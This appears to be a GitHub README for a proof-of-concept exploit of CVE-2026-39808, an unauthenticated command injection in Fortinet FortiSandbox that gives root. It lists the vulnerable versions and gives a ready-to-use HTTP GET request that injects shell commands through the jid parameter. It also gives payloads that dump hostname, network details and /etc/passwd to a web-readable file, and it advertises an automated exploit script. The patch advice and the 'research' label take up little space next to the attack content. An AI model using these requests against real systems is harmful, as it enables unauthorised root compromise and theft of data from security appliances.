
CVE-2026-39808
This repository contains a clean and well-documented Proof of Concept for CVE-2026-39808 — a critical unauthenticated command injection vulnerability in Fortinet FortiSandbox that allows sandbox escape and remote code execution as root (uid=0).
jid parameter
Successful exploitation showing uid=0 gid=0 groups=0
| Version Range | Status |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | Vulnerable |
| FortiSandbox 5.0.0 – 5.0.5 | Vulnerable |
| 4.4.9+ / 5.0.6+ | Patched |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
Open in browser:
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → Automated Python exploitburp-request.txt → Ready-to-use Burp Suite requestpayloads.md → Collection of useful payloadsscreenshots/ → Step-by-step exploitation imagesREADME.md → This fileUpdate FortiSandbox immediately to one of the following versions:
Fortinet has released official patches addressing this vulnerability.
Made for Research & Learning Purposes
⭐ Star this repo if it helped you!